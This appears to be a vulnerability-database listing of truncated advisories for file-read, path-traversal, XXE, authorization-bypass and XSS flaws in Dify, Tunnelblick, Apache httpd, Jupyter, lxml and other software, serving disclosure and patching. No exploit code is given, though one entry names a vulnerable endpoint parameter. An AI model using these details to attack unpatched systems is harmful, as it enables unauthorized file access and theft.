CVE-2026-41950

CVE-2026-41950 affects Dify before version 1.14.0. An authorization bypass in the chat-messages flow allows an authenticated user to read full contents of files uploaded by other users within the same tenant by supplying an arbitrary file UUID in the files array of a chat-messages request. The ro...

XML External Entity (XXE) Injection

Overview org.opencms:opencms-core is a Java open source content management system by Alkacon Software. Affected versions of this package are vulnerable to XML External Entity XXE Injection insecure XML parsing of user-supplied .zip files containing manifest.xml in the Admin Import DB. An attacker...

CVE-2026-31893 Tunnelblick arbitrary file read via symlink following in tunnelblickd

Tunnelblick is an open source graphic user interface for OpenVPN on macOS. In versions 3.3beta26 through 9.0beta01, any local user can read arbitrary root-owned files by exploiting a symlink following vulnerability in tunnelblick-helper, reachable through the world-accessible tunnelblickd Unix...

EUVD-2026-27434

Tunnelblick is an open source graphic user interface for OpenVPN on macOS. In versions 3.3beta26 through 9.0beta01, any local user can read arbitrary root-owned files by exploiting a symlink following vulnerability in tunnelblick-helper, reachable through the world-accessible tunnelblickd Unix...

PT-2026-37239

Name of the Vulnerable Software and Affected Versions Dify versions prior to 1.14.0 Description An authorization bypass allows authenticated users to read the full contents of files uploaded by other users within the same tenant. This occurs due to insufficient permission verification in the...

Nix 安全漏洞

Nix is a package manager developed by Nix itself. Versions of Nix prior to 2.34.7 contained a security vulnerability. This vulnerability stemmed from directory traversal attacks using the nix-prefetch-url --unpack or nix store prefetch-file --unpack commands, allowing access to and writing...

CVE-2026-5337

During the analysis, it was identified that authenticated attackers with Subscriber-level access or higher are able to perform an Insecure Direct Object Reference IDOR attack. This vulnerability exists because the Frontend File Manager Plugin WordPress plugin through 23.6 does not properly valida...

XML External Entity (XXE) Injection

Overview Affected versions of this package are vulnerable to XML External Entity XXE Injection via the create method in the DictionaryEntryPersistor class, which initializes a SAXParserFactory without enabling FEATURESECUREPROCESSING or disabling DTD processing. An attacker can access local files...

DEBIAN-CVE-2026-24072

An escalation of privilege bug in various modules in Apache HTTP 2.4.66 and earlier allows local .htaccess authors to read files with the privileges of the httpd user. Users are recommended to upgrade to version 2.4.67, which fixes this issue...

Apache 2.4.x < 2.4.67 Multiple Vulnerabilities

The version of Apache httpd installed on the remote host is prior to 2.4.67. It is, therefore, affected by multiple vulnerabilities as referenced in the 2.4.67 advisory. - Heap-based Buffer Overflow vulnerability in modproxyajp of Apache HTTP Server. If modproxyajp connects to a malicious AJP...

Astra Linux – Vulnerability in Chromium

Inappropriate implementation in Downloads in Google Chrome prior to 114.0.5735.90 allowed an attacker who convinced a user to install a malicious extension to bypass file access restrictions via a crafted HTML page. Chromium security severity: Medium...

Astra Linux – Vulnerability in Containerd

Containerd is a container runtime that is available as a daemon for Linux and Windows. A bug was discovered in Containerd prior to versions 1.6.1, 1.5.10, and 1.14.12. In these versions, containers launched through Containerd’s CRI implementation on Linux, with a specially crafted image...

Directory Traversal

Overview sublinear-time-solver is a The Ultimate Mathematical & AI Toolkit: Sublinear algorithms, consciousness exploration, psycho-symbolic reasoning, chaos analysis, and temporal prediction in one unified MCP interface. WASM-accelerated with Lyapunov exponents and attractor dynamics. Affected...

CVE-2026-7551

HKUDS OpenHarness contains a remote code execution vulnerability in the /bridge slash command that allows remote senders accepted by configuration to execute arbitrary operating system commands. Attackers can invoke the /bridge spawn command with attacker-controlled command text that is forwarded...

GHSA-RCH3-82JR-F9W9 Jupyter Notebook Vulnerable to Authentication Token Theft via CommandLinker XSS

Impact A stored Cross-Site Scripting XSS vulnerability in Jupyter Notebook allows attackers to steal authentication tokens from users who open malicious notebook files and interact with elements that the attacker can make look indistinguishable from legitimate controls single click interaction. T...

CVE-2026-41882

In JetBrains IntelliJ IDEA before 2024.3.7.1, 2025.1.7.1, 2025.2.6.2, 2025.3.4.1, 2026.1.1 reading arbitrary local files was possible via built-in web server...

EUVD-2026-26368

In JetBrains IntelliJ IDEA before 2024.3.7.1, 2025.1.7.1, 2025.2.6.2, 2025.3.4.1, 2026.1.1 reading arbitrary local files was possible via built-in web server...

Wangshen SecGate 3600 Path Traversal Vulnerability

Wangshen SecGate 3600 2400 contains a path traversal caused by manipulation of the 'filename' argument in '?g=logexportfile', letting remote attackers access arbitrary files, exploit requires remote access. id: CVE-2025-4078 info: name: Wangshen SecGate 3600 Path Traversal Vulnerability author: A...

SUSE CVE-2026-41066

lxml is a library for processing XML and HTML in the Python language. Prior to 6.1.0, using either of the two parsers in the default configuration with resolveentities=True allows untrusted XML input to read local files. Setting the resolveentities option explicitly to resolveentities='internal' ...

OPPO ColorOS Assistant 路径遍历漏洞

OPPO ColorOS Assistant is an intelligent voice assistant application developed by OPPO Corporation in China. OPPO ColorOS Assistant has a path traversal vulnerability, which stems from an unvalidated startup download channel, potentially leading to file path traversal...